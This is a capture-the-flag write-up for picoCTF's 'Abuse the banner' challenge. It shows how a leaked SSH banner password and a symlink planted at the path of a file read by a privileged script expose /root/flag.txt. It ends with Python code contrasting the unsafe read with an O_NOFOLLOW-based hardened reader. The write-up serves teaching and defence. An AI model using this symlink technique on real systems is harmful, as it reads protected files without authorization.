Description

Can you abuse the banner? The server has been leaking some crucial information on tethys.picoctf.net 64344. Use the leaked information to get to the server. To connect to the running application use nc tethys.picoctf.net 56677. From the above information abuse the machine and find the flag in the /root directory.


Steps:

So once I connect to the first domain using netcat, I see a password.

╰─❯ nc tethys.picoctf.net 64344                                              
SSH-2.0-OpenSSH_7.6p1 My_Passw@rd_@1234

And I tried to log in to the next server using netcat; it asked for a password, so I entered the previous one and it worked.

╰─❯ nc tethys.picoctf.net 56677                                             
*************************************
**************WELCOME****************
*************************************
 
what is the password?
My_Passw@rd_@1234
What is the top cyber security conference in the world?
defcon
the first hacker ever was known for phreaking(making free phone calls), who was it?
john
player@challenge:~$ ls
ls
cd banner  text
player@challenge:~$ /root
cd /root
player@challenge:/root$ ls
ls
flag.txt  script.py
player@challenge:/root$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
player@challenge:/root$ cat script.py
cat script.py
 
import os
import pty
 
incorrect_ans_reply = "Lol, good try, try again and good luck\n"
 
if __name__ == "__main__":
    try:
      with open("/home/player/banner", "r") as f:
        print(f.read())
    except:
      print("*********************************************")
      print("***************DEFAULT BANNER****************")
      print("*Please supply banner in /home/player/banner*")
      print("*********************************************")
 
try:
    request = input("what is the password? \n").upper()
    while request:
        if request == 'MY_PASSW@RD_@1234':
            text = input("What is the top cyber security conference in the world?\n").upper()
            if text == 'DEFCON' or text == 'DEF CON':
                output = input(
                    "the first hacker ever was known for phreaking(making free phone calls), who was it?\n").upper()
                if output == 'JOHN DRAPER' or output == 'JOHN THOMAS DRAPER' or output == 'JOHN' or output== 'DRAPER':
                    scmd = 'su - player'
                    pty.spawn(scmd.split(' '))
 
                else:
                    print(incorrect_ans_reply)
            else:
                print(incorrect_ans_reply)
        else:
            print(incorrect_ans_reply)
            break
 
except:
    KeyboardInterrupt
 
player@challenge:/root$


Analysis of script.py

  1. Banner File:

    • The script reads a banner from /home/player/banner.

    • If the banner file is missing, it displays a default banner.

  2. Password Check:

    • The script asks for a password and checks if it matches MY_PASSW@RD_@1234 (case-insensitive, because the input is upper-cased before comparison).

  3. Security Questions:

    • If the password is correct, it asks two security questions:

      • “What is the top cyber security conference in the world?” (Answer: DEFCON or DEF CON).

      • “The first hacker ever was known for phreaking (making free phone calls), who was it?” (Answer: JOHN DRAPER, JOHN THOMAS DRAPER, JOHN, or DRAPER).

  4. Privilege Escalation:

    • If all answers are correct, the script spawns su - player in a pty, switching to the player user. Note that the banner file is read and printed (step 1) before any of these checks run.

Exploitation plan

Since you cannot directly read /root/flag.txt, you need to escalate privileges or trick the script into giving you access.

Since the script opens /home/player/banner and prints its contents before asking for the password, and does so with the privileges of the script itself rather than the player user, we can remove the existing banner and replace it with a symlink pointing at /root/flag.txt. The next connection will then print the flag as the banner.

player@challenge:~$ rm /home/player/banner
player@challenge:~$ ln -s /root/flag.txt /home/player/banner

And now reconnect:

╰─❯ nc tethys.picoctf.net 56677                                              
picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_******}
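The root cause is a privileged open() of a path the unprivileged user controls, which silently follows symlinks. The following is an added example (not part of the writeup or the challenge's script.py) that reproduces the unsafe read beside a hardened reader which refuses symlinks and files not owned by the expected user; the directory, file names and flag value are constructed placeholders.

```python
import os
import stat
import tempfile
from typing import Optional


def read_banner_unsafe(path: str) -> str:
    # Mirrors the challenge script: open() follows symlinks, so whoever can
    # write the banner path chooses which file the privileged script reads.
    with open(path, "r") as f:
        return f.read()


def read_banner_safe(path: str, expected_uid: int, max_bytes: int = 4096) -> Optional[str]:
    """Return the banner only if it is a regular file (not a symlink) owned by expected_uid."""
    try:
        # O_NOFOLLOW makes the open fail with ELOOP if the final component is a symlink
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_NOCTTY)
    except OSError:
        return None  # symlink, missing, or unreadable: caller falls back to a default banner
    try:
        st = os.fstat(fd)  # check the opened descriptor, not the path, to avoid a race
        if not stat.S_ISREG(st.st_mode) or st.st_uid != expected_uid:
            return None
        return os.read(fd, max_bytes).decode("utf-8", "replace")
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed scenario: a secret file, a symlink banner pointing at it, and an honest banner."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "flag.txt")
        linked = os.path.join(d, "banner")
        honest = os.path.join(d, "banner_ok")
        with open(secret, "w") as f:
            f.write("picoCTF{constructed_placeholder}")
        with open(honest, "w") as f:
            f.write("WELCOME")
        os.symlink(secret, linked)
        return {
            "unsafe_leaks": read_banner_unsafe(linked),          # follows the link: secret leaks
            "safe_blocks": read_banner_safe(linked, os.getuid()),  # refuses the symlink: None
            "safe_allows": read_banner_safe(honest, os.getuid()),  # regular owned file: "WELCOME"
        }
```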
